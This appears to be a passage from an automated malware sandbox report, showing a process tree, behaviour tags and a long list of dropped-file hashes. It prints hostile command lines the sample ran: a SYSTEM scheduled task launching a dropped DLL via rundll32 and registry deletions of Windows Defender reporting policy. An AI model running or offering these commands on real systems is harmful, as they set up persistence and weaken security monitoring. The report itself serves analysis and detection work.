C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "teabCtqLwEhjalrvZ" /SC once /ST 02:52:45 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\pNRMKCwFqwdxSFZt\WaxvTtgZ\dpjJBaG.dll\",#1 /Dtsite_idpfX 385118" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1352
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "teabCtqLwEhjalrvZ"3⤵PID:1976
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1776
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1936
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1780
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MZObKWyefxVnmbFER"3⤵PID:796
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\pNRMKCwFqwdxSFZt\WaxvTtgZ\dpjJBaG.dll",#1 /Dtsite_idpfX 3851182⤵PID:860
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\pNRMKCwFqwdxSFZt\WaxvTtgZ\dpjJBaG.dll",#1 /Dtsite_idpfX 3851183⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1996 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "teabCtqLwEhjalrvZ"4⤵PID:644
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1676
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1756
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "14695168942031462607-12005698793797564411341817619396318389-1603432200-1317412806"1⤵PID:1960
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:796
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5b295176b63903f07cdf91d0c24b8b671
SHA14bb1ba92e478bde7520ebd30acc5248747844b2b
SHA2561a9afe46cf8875b7156cc17addbca9ab7e1bc45d3a663ec43337a541d3cd172f
SHA5126beef117320d01273215fff71f37fdeb154d857a1f63956ed8a44ce861343bba03800ecc373aafa08e424d89ce42bf126b452f4f3d9700a15ff4c290bc979133
-
Filesize
2KB
MD5e6d2e5068473eff4e7ebd6c57cd08f35
SHA10c14c27c90609070a5b4287f16940d274dddd5a5
SHA256b3de2640f508ce4f8e929bca829efa7ad1a79026c90622b3cdd0130b8b53ea4e
SHA51214e3c2505eb7595a5f04abc770fab959097b0b42345345a94897581d4c32d93371d169cc3cda43557cac9ae9e0793f0febf36d63f0452d00f8724f2bf92264fd
-
Filesize
2KB
MD531736338844ac2c1c8f27affd1497c14
SHA1f11ff12cbcd22ab90361f40901c9c2dc4211cafd
SHA256ae17cfc1e76f78702dca193659bb032a1f9bed56dda5d2c1d56f9cf4671425ab
SHA5120af3088a025cccd3c491e7f5302c435b09f7b31fe1266a5f99f76c00dc7024c561537fc6eaa8add1103a9d248f2caba59f2c72f809aa20cc3572d5ef497ac933
-
Filesize
2KB
MD557b43803ba79f365b023070e37e9ac36
SHA18158984d3e33372e6069efb52594ace2b011a378
SHA25667e3163d56828f03273130eaa281b8ed80b98f9bd905c8d3e515ddeabdb0b95f
SHA5128eddad211fe84ad0ac9750e86205e9e554577b39172076c969d9ed1de9be844a56cf71a40410a3893a69971e5a1fd3ea9ed7bc264f1e7131603d75793106c8a4
-
Filesize
1.1MB
MD5706d33b95f70a5e78b4819d778e65622
SHA16fe1b0eec96b1951fa6b156bf65aeea5eb325b7c
SHA256282c77b225807e72e68379e4e6b2b6af6e338f13d0f15e02757b73c3532e8cb8
SHA51244286fe2dabc57705c6bdb94d833152f93fdc789504a8b714471022d2a004619b05e80af8d42a4c990f5b6c97cd364c57684c747b1c2eaf0c35e7031e4ac7609
-
Filesize
2KB
MD59f37d8a70aa9ee6d03af19320241d8b4
SHA19a6c78b31f3ea0ce216477da448ffaadb70a4cb6
SHA256313c4c7533b3958d8b791f5c96631d6c208d9bac2f48c7eaf10b660e01d2262e
SHA51222fb626b6ef6427a74c2b08e35b35e6183147aa8b16f562dc96107091d89f2328a8860cd71f07af0ee0ef14a69a7d5b8036410918646b414f32657e1b1bc9d46
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5c167008e35f1baa1bc18ce92dbfe383d
SHA1bc4e4154e9f2a7e906e1482a017d8cd0f3518386
SHA256ba075e94abe951e97216cea7b4b811d6f135a7ffb643616e19be188ab2565e1a
SHA512be5a24ea888f7449ccf0afcdf8021993ac6cfaaf0706a48c693322693fc7b0b82043b2dca17f584c59cecf8334dadd3429e56c42991472aca9fb7f529df7e663
-
Filesize
6.3MB
MD58e7762c25222df3d9c47b6765d9fd929
SHA1eea05c8c1cff62344146560ec342fba41c42a07f
SHA25648971f35126b40a980771c3547ee8093eacafee9d74ff271c44534fc0b11b861
SHA512515ab8faf80071d50617c34a4036bd5f18b0bde4f72d5d7c01ef42bfaf9ca773dec934abbf82deee1a1a8fa8281fc0180dfc1c2d252dea98ecfbe72b549bf6c7
-
Filesize
6.3MB
MD58e7762c25222df3d9c47b6765d9fd929
SHA1eea05c8c1cff62344146560ec342fba41c42a07f
SHA25648971f35126b40a980771c3547ee8093eacafee9d74ff271c44534fc0b11b861
SHA512515ab8faf80071d50617c34a4036bd5f18b0bde4f72d5d7c01ef42bfaf9ca773dec934abbf82deee1a1a8fa8281fc0180dfc1c2d252dea98ecfbe72b549bf6c7
-
Filesize
7.0MB
MD56ed4db95c1b73bd1218dc5d3cf5ba478
SHA1ffaf56e70fb893827f072ed6b553ce21c6f00e39
SHA256f234bd620771719dfbfaa2724b86ed1be54f7583128ec55955a5f5c5bdf79790
SHA5129ef128ae55bb8ecc871916a9f0c2b9beb07d9b4d62f89ecb487362699df6089ecabe015cb36b9a694c44cd63ffb2af5bbd71073efcae0e26c1db09217c2593a9
-
Filesize
7.0MB
MD56ed4db95c1b73bd1218dc5d3cf5ba478
SHA1ffaf56e70fb893827f072ed6b553ce21c6f00e39
SHA256f234bd620771719dfbfaa2724b86ed1be54f7583128ec55955a5f5c5bdf79790
SHA5129ef128ae55bb8ecc871916a9f0c2b9beb07d9b4d62f89ecb487362699df6089ecabe015cb36b9a694c44cd63ffb2af5bbd71073efcae0e26c1db09217c2593a9
-
Filesize
7.0MB
MD56ed4db95c1b73bd1218dc5d3cf5ba478
SHA1ffaf56e70fb893827f072ed6b553ce21c6f00e39
SHA256f234bd620771719dfbfaa2724b86ed1be54f7583128ec55955a5f5c5bdf79790
SHA5129ef128ae55bb8ecc871916a9f0c2b9beb07d9b4d62f89ecb487362699df6089ecabe015cb36b9a694c44cd63ffb2af5bbd71073efcae0e26c1db09217c2593a9
-
Filesize
7.0MB
MD56ed4db95c1b73bd1218dc5d3cf5ba478
SHA1ffaf56e70fb893827f072ed6b553ce21c6f00e39
SHA256f234bd620771719dfbfaa2724b86ed1be54f7583128ec55955a5f5c5bdf79790
SHA5129ef128ae55bb8ecc871916a9f0c2b9beb07d9b4d62f89ecb487362699df6089ecabe015cb36b9a694c44cd63ffb2af5bbd71073efcae0e26c1db09217c2593a9
-
Filesize
7.0MB
MD56ed4db95c1b73bd1218dc5d3cf5ba478
SHA1ffaf56e70fb893827f072ed6b553ce21c6f00e39
SHA256f234bd620771719dfbfaa2724b86ed1be54f7583128ec55955a5f5c5bdf79790
SHA5129ef128ae55bb8ecc871916a9f0c2b9beb07d9b4d62f89ecb487362699df6089ecabe015cb36b9a694c44cd63ffb2af5bbd71073efcae0e26c1db09217c2593a9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53bb7840130e6802a3e52596f3f3ed4c4
SHA1171872f9e9fc6e4b4b6a2aa7163286b3f32d7bfc
SHA256f10defffd749a07c1866800448bc7fff1621a019b92f661ae7a9a51d37401826
SHA5125341aff460fb6817fe61429e141604e8d76d9e1cbde75272ec73ec102094af4d247ebf26fc19427674f47c2ce828ce77f30a885367293028561d7c1af5ac7ca1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5501bf987a5f7ac1f7654c82310a10bd9
SHA1794e71c7fe96741385a0ab34add370760db5a084
SHA256267e8634a551200e0ca1accedde0c9f3f05b890a1e0ae4a9f06f012a2e1d9c95
SHA512acbce50e63e25e06309aaed8da87208b6b33a9b086bf04b8aec0224a91f70a940a72ec75082d18b2fc403cd721d4f35fee911a34a3ae834d9cbb31848b2f86c0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD57b2af6bda5d1eab5f4707ddbbb7a53ae
SHA13c37bdbc467c781e889a7d461f8c014c974fea1d
SHA256f2a49df411f1efa4428417bf9b5004c5fa4845552f89d76b120c233ea174b876
SHA5125d1b8bd045ad87842a0ac23af8e2608be571156dc82659e5886c75a5f8dbcae9d3c1b6b9c2fa45828378872186bb30e67957db12d98a7bf8d5fde49d3acdfcab
-
Filesize
7KB
MD5cd5ebc5a0e8f20a0ba1815d9489dcd7c
SHA1956c5ebd1ad3a3f280fe0ca1c4bf3294fc9c3ad4
SHA2561a6b641607c8a2865a7fc05567fa36e15bffa93f4072abb8cca32d6676dd915f
SHA512eaa9d7c42b73d5cf3a6b09e0a6cb178594999f7e3cab045a23e6fa0f3b37cc595097573d8874eb7392f8c909687b822cfa9abb307a2c82f898fd179dd8031423
-
Filesize
7.0MB
MD56ed4db95c1b73bd1218dc5d3cf5ba478
SHA1ffaf56e70fb893827f072ed6b553ce21c6f00e39
SHA256f234bd620771719dfbfaa2724b86ed1be54f7583128ec55955a5f5c5bdf79790
SHA5129ef128ae55bb8ecc871916a9f0c2b9beb07d9b4d62f89ecb487362699df6089ecabe015cb36b9a694c44cd63ffb2af5bbd71073efcae0e26c1db09217c2593a9
-
Filesize
7.0MB
MD56ed4db95c1b73bd1218dc5d3cf5ba478
SHA1ffaf56e70fb893827f072ed6b553ce21c6f00e39
SHA256f234bd620771719dfbfaa2724b86ed1be54f7583128ec55955a5f5c5bdf79790
SHA5129ef128ae55bb8ecc871916a9f0c2b9beb07d9b4d62f89ecb487362699df6089ecabe015cb36b9a694c44cd63ffb2af5bbd71073efcae0e26c1db09217c2593a9
-
Filesize
6.1MB
MD59f51792f0386c429ef1bc4bb5a3eff82
SHA1d82c02b8fe37bc8ae03e00a225c68f9c0c3ef100
SHA2560c632a3f1d7503041909461bf8ca77e2c988203eaf0ad14488368db5e7a9e12d
SHA51211281e81d42432b152534251e2e2d4825de8bf0b5ab72f7fbd0d530b4782c8a20eafd3c8a00fc0303b3e3b17a293790447f33745ecd4b6e3c26fb5ac13d43210
-
Filesize
9KB
MD55aa0778d15b4bafa793f08ea2567c4a5
SHA1451e0469fcccdeeb973311cc9e84acea07edccad
SHA256b9a50711b6fa61b851e0fd7d68fd4548a4c685e0b7060f6f746e056049448a49
SHA512c4f57be3703825ef8ab894f527c0d80b9bcbdf7fb4b221a5dbf190173fcc4a604975deffd7ecbd7238a7f14d6f526eca5f3788a2e46f1a4742dba1e45bfa5822
-
Filesize
6KB
MD53beaf6554db4ea7281a1960a259c3b5a
SHA1af61f3bd0f4ef848691818ecc50d2fcc561f79b4
SHA256960a330c8dac0d89c0444ab3cd2a6f42bf6d4443765252a58459f5786209d9ca
SHA5129f6de94bd5895c4590ac1feaacc75abcb52dadd3b34dc49839350c4376ccd8e1f96a38b696d0f7fa0851e72f789581610c0187ada610ccf87188cd99d5d804ff
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.3MB
MD58e7762c25222df3d9c47b6765d9fd929
SHA1eea05c8c1cff62344146560ec342fba41c42a07f
SHA25648971f35126b40a980771c3547ee8093eacafee9d74ff271c44534fc0b11b861
SHA512515ab8faf80071d50617c34a4036bd5f18b0bde4f72d5d7c01ef42bfaf9ca773dec934abbf82deee1a1a8fa8281fc0180dfc1c2d252dea98ecfbe72b549bf6c7
-
Filesize
6.3MB
MD58e7762c25222df3d9c47b6765d9fd929
SHA1eea05c8c1cff62344146560ec342fba41c42a07f
SHA25648971f35126b40a980771c3547ee8093eacafee9d74ff271c44534fc0b11b861
SHA512515ab8faf80071d50617c34a4036bd5f18b0bde4f72d5d7c01ef42bfaf9ca773dec934abbf82deee1a1a8fa8281fc0180dfc1c2d252dea98ecfbe72b549bf6c7
-
Filesize
6.3MB
MD58e7762c25222df3d9c47b6765d9fd929
SHA1eea05c8c1cff62344146560ec342fba41c42a07f
SHA25648971f35126b40a980771c3547ee8093eacafee9d74ff271c44534fc0b11b861
SHA512515ab8faf80071d50617c34a4036bd5f18b0bde4f72d5d7c01ef42bfaf9ca773dec934abbf82deee1a1a8fa8281fc0180dfc1c2d252dea98ecfbe72b549bf6c7
-
Filesize
6.3MB
MD58e7762c25222df3d9c47b6765d9fd929
SHA1eea05c8c1cff62344146560ec342fba41c42a07f
SHA25648971f35126b40a980771c3547ee8093eacafee9d74ff271c44534fc0b11b861
SHA512515ab8faf80071d50617c34a4036bd5f18b0bde4f72d5d7c01ef42bfaf9ca773dec934abbf82deee1a1a8fa8281fc0180dfc1c2d252dea98ecfbe72b549bf6c7
-
Filesize
7.0MB
MD56ed4db95c1b73bd1218dc5d3cf5ba478
SHA1ffaf56e70fb893827f072ed6b553ce21c6f00e39
SHA256f234bd620771719dfbfaa2724b86ed1be54f7583128ec55955a5f5c5bdf79790
SHA5129ef128ae55bb8ecc871916a9f0c2b9beb07d9b4d62f89ecb487362699df6089ecabe015cb36b9a694c44cd63ffb2af5bbd71073efcae0e26c1db09217c2593a9
-
Filesize
7.0MB
MD56ed4db95c1b73bd1218dc5d3cf5ba478
SHA1ffaf56e70fb893827f072ed6b553ce21c6f00e39
SHA256f234bd620771719dfbfaa2724b86ed1be54f7583128ec55955a5f5c5bdf79790
SHA5129ef128ae55bb8ecc871916a9f0c2b9beb07d9b4d62f89ecb487362699df6089ecabe015cb36b9a694c44cd63ffb2af5bbd71073efcae0e26c1db09217c2593a9
-
Filesize
7.0MB
MD56ed4db95c1b73bd1218dc5d3cf5ba478
SHA1ffaf56e70fb893827f072ed6b553ce21c6f00e39
SHA256f234bd620771719dfbfaa2724b86ed1be54f7583128ec55955a5f5c5bdf79790
SHA5129ef128ae55bb8ecc871916a9f0c2b9beb07d9b4d62f89ecb487362699df6089ecabe015cb36b9a694c44cd63ffb2af5bbd71073efcae0e26c1db09217c2593a9
-
Filesize
7.0MB
MD56ed4db95c1b73bd1218dc5d3cf5ba478
SHA1ffaf56e70fb893827f072ed6b553ce21c6f00e39
SHA256f234bd620771719dfbfaa2724b86ed1be54f7583128ec55955a5f5c5bdf79790
SHA5129ef128ae55bb8ecc871916a9f0c2b9beb07d9b4d62f89ecb487362699df6089ecabe015cb36b9a694c44cd63ffb2af5bbd71073efcae0e26c1db09217c2593a9
-
Filesize
6.1MB
MD59f51792f0386c429ef1bc4bb5a3eff82
SHA1d82c02b8fe37bc8ae03e00a225c68f9c0c3ef100
SHA2560c632a3f1d7503041909461bf8ca77e2c988203eaf0ad14488368db5e7a9e12d
SHA51211281e81d42432b152534251e2e2d4825de8bf0b5ab72f7fbd0d530b4782c8a20eafd3c8a00fc0303b3e3b17a293790447f33745ecd4b6e3c26fb5ac13d43210
-
Filesize
6.1MB
MD59f51792f0386c429ef1bc4bb5a3eff82
SHA1d82c02b8fe37bc8ae03e00a225c68f9c0c3ef100
SHA2560c632a3f1d7503041909461bf8ca77e2c988203eaf0ad14488368db5e7a9e12d
SHA51211281e81d42432b152534251e2e2d4825de8bf0b5ab72f7fbd0d530b4782c8a20eafd3c8a00fc0303b3e3b17a293790447f33745ecd4b6e3c26fb5ac13d43210
-
Filesize
6.1MB
MD59f51792f0386c429ef1bc4bb5a3eff82
SHA1d82c02b8fe37bc8ae03e00a225c68f9c0c3ef100
SHA2560c632a3f1d7503041909461bf8ca77e2c988203eaf0ad14488368db5e7a9e12d
SHA51211281e81d42432b152534251e2e2d4825de8bf0b5ab72f7fbd0d530b4782c8a20eafd3c8a00fc0303b3e3b17a293790447f33745ecd4b6e3c26fb5ac13d43210
-
Filesize
6.1MB
MD59f51792f0386c429ef1bc4bb5a3eff82
SHA1d82c02b8fe37bc8ae03e00a225c68f9c0c3ef100
SHA2560c632a3f1d7503041909461bf8ca77e2c988203eaf0ad14488368db5e7a9e12d
SHA51211281e81d42432b152534251e2e2d4825de8bf0b5ab72f7fbd0d530b4782c8a20eafd3c8a00fc0303b3e3b17a293790447f33745ecd4b6e3c26fb5ac13d43210